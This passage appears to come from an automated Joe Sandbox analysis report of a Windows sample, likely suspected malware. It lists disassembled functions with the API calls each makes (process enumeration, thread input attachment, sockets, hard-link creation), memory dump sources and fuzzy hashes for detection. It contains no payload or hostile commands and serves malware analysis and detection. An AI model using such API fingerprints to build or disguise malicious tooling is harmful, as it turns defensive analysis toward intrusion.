                                                                                                                                                                                                                                                                                        • Opcode ID: a3ab3d56afb5d7050e8198eafe028cce2a3b5f92ffaa66830b9693a284c121cc
                                                                                                                                                                                                                                                                                        • Instruction ID: de0dda4aca37043630dc1254d7e21c3782ad04051e6193dca78ede7c55c0b9d8
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a3ab3d56afb5d7050e8198eafe028cce2a3b5f92ffaa66830b9693a284c121cc
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D0110671640248BEFF205F65CC06FAB37A9EF95B64F110515FA51E21A0D671EC52EB10
                                                                                                                                                                                                                                                                                        Function 00F6389E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F08577: _wcslen.LIBCMT ref: 00F0858A
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F636F4: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00F63712
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F636F4: GetWindowThreadProcessId.USER32(?,00000000), ref: 00F63723
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F636F4: GetCurrentThreadId.KERNEL32 ref: 00F6372A
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F636F4: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00F63731
                                                                                                                                                                                                                                                                                        • GetFocus.USER32 ref: 00F638C4
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F6373B: GetParent.USER32(00000000), ref: 00F63746
                                                                                                                                                                                                                                                                                        • GetClassNameW.USER32(?,?,00000100), ref: 00F6390F
                                                                                                                                                                                                                                                                                        • EnumChildWindows.USER32(?,00F63987), ref: 00F63937
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                                                                                                                                                                                                                                                                        • String ID: %s%d
                                                                                                                                                                                                                                                                                        • API String ID: 1272988791-1110647743
                                                                                                                                                                                                                                                                                        • Opcode ID: ed80a1b61e7257eeded97f8c4b5199b3551b3d48256ad4d6764c384c36bd0224
                                                                                                                                                                                                                                                                                        • Instruction ID: 237400b7378dd51aa0cb9d493dd69dbcf88e85702dc042eee3b27dc1cdad3002
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ed80a1b61e7257eeded97f8c4b5199b3551b3d48256ad4d6764c384c36bd0224
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3C11E4717002096BCF11BF74DD86EED77AAAF98354F048069B9099B292CE759906FB30
                                                                                                                                                                                                                                                                                        Function 00F96321 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00F96360
                                                                                                                                                                                                                                                                                        • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00F9638D
                                                                                                                                                                                                                                                                                        • DrawMenuBar.USER32(?), ref: 00F9639C
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Menu$InfoItem$Draw
                                                                                                                                                                                                                                                                                        • String ID: 0
                                                                                                                                                                                                                                                                                        • API String ID: 3227129158-4108050209
                                                                                                                                                                                                                                                                                        • Opcode ID: 4818552adae74aefe566450e3a4400fb9b43301cfb3019fd080ee26541308085
                                                                                                                                                                                                                                                                                        • Instruction ID: 9b87c5c0a66cf860e2b243cde10c2e6b4a88ce52070c88fed5ad2e15575bc7ca
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4818552adae74aefe566450e3a4400fb9b43301cfb3019fd080ee26541308085
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 97016D32900218AFEF519F11DC84FAE7BB4FB44365F14809AE849D6251DF308A95FF21
                                                                                                                                                                                                                                                                                        Function 00F5E778 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 28libraryloaderCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,GetSystemWow64DirectoryW), ref: 00F5E797
                                                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32 ref: 00F5E7BD
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                                                                                                        • String ID: GetSystemWow64DirectoryW$X64
                                                                                                                                                                                                                                                                                        • API String ID: 3013587201-2590602151
                                                                                                                                                                                                                                                                                        • Opcode ID: ba3c6730d17e20cf9c0c6812d4ed98163fe989e6fbd7f6c3a8096b0bf68f1f1f
                                                                                                                                                                                                                                                                                        • Instruction ID: 62cf7064aa698ec9ff9b744eb3e2ba5c0ea5352d032de6a9a7778c132c882b71
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ba3c6730d17e20cf9c0c6812d4ed98163fe989e6fbd7f6c3a8096b0bf68f1f1f
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 01E02B73D116219BE77947205C44FA932246F20746B35056AEE01E2111DB30CECCBA94
                                                                                                                                                                                                                                                                                        Function 00F6096F Relevance: 6.3, APIs: 4, Instructions: 322COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                        • Opcode ID: 389b8be6c47b28581038d9b3f6d3e3108033ef996c136a839ab4883f209f7a24
                                                                                                                                                                                                                                                                                        • Instruction ID: 311231dbba9b22321dac31011830725f6c4e181b94ba0c46257d7d453cff0082
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 389b8be6c47b28581038d9b3f6d3e3108033ef996c136a839ab4883f209f7a24
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FFC15D75A0021AEFDB04CF94C894EAEB7B5FF88714F248598E505DB251DB31EE41EB90
                                                                                                                                                                                                                                                                                        Function 00F341F3 Relevance: 6.3, APIs: 4, Instructions: 305COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: __alldvrm$_strrchr
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1036877536-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 65ac5c1fffd7beff7dffafb7e38bd52ffe3f80321006b0a9665303c455145bc9
                                                                                                                                                                                                                                                                                        • Instruction ID: 6ffc0a8ead001085ab00a5e9ccd40585a96668018672709f015a726bb802a469
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 65ac5c1fffd7beff7dffafb7e38bd52ffe3f80321006b0a9665303c455145bc9
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E5A13672D003869FDB21CF18C8917AEBFE5EF55334F2441B9E9959B282C238B941E760
                                                                                                                                                                                                                                                                                        Function 00F60D26 Relevance: 6.2, APIs: 4, Instructions: 230COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00FA0BD4,?), ref: 00F60EE0
                                                                                                                                                                                                                                                                                        • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00FA0BD4,?), ref: 00F60EF8
                                                                                                                                                                                                                                                                                        • CLSIDFromProgID.OLE32(?,?,00000000,00F9DCE0,000000FF,?,00000000,00000800,00000000,?,00FA0BD4,?), ref: 00F60F1D
                                                                                                                                                                                                                                                                                        • _memcmp.LIBVCRUNTIME ref: 00F60F3E
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: FromProg$FreeTask_memcmp
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 314563124-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 203488180330f5305df55079bbbacf623f1e0dab4d9bbe9417c508dd67e163db
                                                                                                                                                                                                                                                                                        • Instruction ID: af9ef8afc39fa851e813ced5a10623115cf827699f06f6d0c48767f85bbdc895
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 203488180330f5305df55079bbbacf623f1e0dab4d9bbe9417c508dd67e163db
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0A81F671A0011AEFCB14DFD4C984EEEB7B9FF89315F204598E506AB250DB71AE06DB60
                                                                                                                                                                                                                                                                                        Function 00F8B0DC Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 00F8B10C
                                                                                                                                                                                                                                                                                        • Process32FirstW.KERNEL32(00000000,?), ref: 00F8B11A
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F0B329: _wcslen.LIBCMT ref: 00F0B333
                                                                                                                                                                                                                                                                                        • Process32NextW.KERNEL32(00000000,?), ref: 00F8B1FC
                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00F8B20B
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F1E36B: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00F44D73,?), ref: 00F1E395
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1991900642-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 4c95d6855f00fedfa41132782eb5a5c0e0b67c339ede244fef97da9f653f909b
                                                                                                                                                                                                                                                                                        • Instruction ID: ae3f1ffddbb161d0b603743cbe8719bd8b5f3473dc13e895dd193c00a323d3df
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4c95d6855f00fedfa41132782eb5a5c0e0b67c339ede244fef97da9f653f909b
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C9514D71908301AFD310EF24DC86A9BBBE8FF89754F40491DF58597291EB74E904EB92
                                                                                                                                                                                                                                                                                        Function 00F41711 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: _free
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 269201875-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 8d04c5478cd30e65b46abbfc884e060a73f4ff378c27b00c78956c9f7f181fb3
                                                                                                                                                                                                                                                                                        • Instruction ID: 115aa63b770e6ed08e2c92806ea5764509363327e91714fcf3dd7d50f1fbcb66
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8d04c5478cd30e65b46abbfc884e060a73f4ff378c27b00c78956c9f7f181fb3
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5C411832A10114ABDB216BB99C42B6E3EA4FF41770F140225FC18D6291E77D48C1B661
                                                                                                                                                                                                                                                                                        Function 00F82533 Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • socket.WSOCK32(00000002,00000002,00000011), ref: 00F8255A
                                                                                                                                                                                                                                                                                        • WSAGetLastError.WSOCK32 ref: 00F82568
                                                                                                                                                                                                                                                                                        • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00F825E7
                                                                                                                                                                                                                                                                                        • WSAGetLastError.WSOCK32 ref: 00F825F1
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ErrorLast$socket
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1881357543-0
                                                                                                                                                                                                                                                                                        • Opcode ID: ba47fa5fd97fc0d85fe972016df731a2b61c7c53bd854fcd5819234c383c609b
                                                                                                                                                                                                                                                                                        • Instruction ID: fbc3c033269925b3426396b8a52d92765c6ded282e01f43628332082584aaf00
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ba47fa5fd97fc0d85fe972016df731a2b61c7c53bd854fcd5819234c383c609b
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F441D474A00200AFE720AF24DC86F6A77E5EF44758F54C448F9598F2D2D776ED42AB90
                                                                                                                                                                                                                                                                                        Function 00F96CB0 Relevance: 6.1, APIs: 4, Instructions: 138COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00F96D1A
                                                                                                                                                                                                                                                                                        • ScreenToClient.USER32(?,?), ref: 00F96D4D
                                                                                                                                                                                                                                                                                        • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00F96DBA
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Window$ClientMoveRectScreen
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3880355969-0
                                                                                                                                                                                                                                                                                        • Opcode ID: e1081d68c7adfeb03e96d21d5a869a822fc483dd26e08212f3ae97c0ac1d92c1
                                                                                                                                                                                                                                                                                        • Instruction ID: e88ea2e39ede3c6a05d53bb1f80c6da3b78827cc2943ff47f59e9b67d0ba06ec
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e1081d68c7adfeb03e96d21d5a869a822fc483dd26e08212f3ae97c0ac1d92c1
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 98512F75A00209EFDF24DF64D8809AE7BB6FF54364F20815AF925D7290D730AD41EB90
                                                                                                                                                                                                                                                                                        Function 00F3B79F Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                        • Opcode ID: 295f586c59d53e4e132e0933767c971df6844bb5a5818adce1082749c855eb63
                                                                                                                                                                                                                                                                                        • Instruction ID: ffeaa634af3afcd64c5b621de98a3977a2609165cb713c8c4d27671c1ac2cac8
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 295f586c59d53e4e132e0933767c971df6844bb5a5818adce1082749c855eb63
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5E411772A00704AFD724AF78CC51B6ABBEDEB88730F10853AF211DB291D7759902A790
                                                                                                                                                                                                                                                                                        Function 00F7611E Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00F761C8
                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00000000), ref: 00F761EE
                                                                                                                                                                                                                                                                                        • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00F76213
                                                                                                                                                                                                                                                                                        • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00F7623F
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3321077145-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 801095a98336163450dd73b103c595f3e76c33ef251c483517d212338e2b15fa
